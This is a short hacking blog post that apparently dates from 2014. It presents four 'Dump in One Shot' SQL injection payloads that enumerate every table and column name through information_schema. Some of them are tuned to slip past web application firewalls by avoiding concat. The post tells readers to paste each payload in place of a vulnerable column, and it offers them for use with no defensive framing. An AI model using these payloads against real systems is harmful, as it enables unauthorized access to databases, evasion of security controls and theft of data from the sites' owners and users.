Starting on the name of My god "Allah" the most beneficent the most merciful

This time i wont take much of your time as its not a Tutorial on DIOS and if you want then you can visit.

http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-1.html
http://securityidiots.com/Web-Pentest/SQL-Injection/Dump-in-One-Shot-part-2.html
In this Post we will only know DIOS a little more and introduce some different and new flavors of DIOS.

USAGE FOR ALL DIOS: Just put the code in place of vulnerable column and see the magic

As most of you have seen this one the first DIOS
(select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a)
::POC::
Above is a Awesome Piece of code made by Profexer a Russian hacker

Below we can see another DIOS BY Dr.Z3r0
(select(select concat(@:=0xa7,(select count(*)from(information_schema.columns)where(@:=concat(@,0x3c6c693e,table_name,0x3a,column_name))),@)))
::POC::
The Next DIOS you can use when any WAF is really fucking you by blocking concat, then herez the solution made by my friend [email protected]
(Select export_set(5,@:=0,(select count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2))
::POC::
Now the next DIOS by me, again the same thing it saves your ass from WAF by avoiding concat secondly it allows you to add upto 9 columns without any modification and probably be the shortest DIOS.
make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)
::POC::


Thanks for reading.
Happy Hacking

Author : Zenodermus Javanicus
Date : 2014-07-21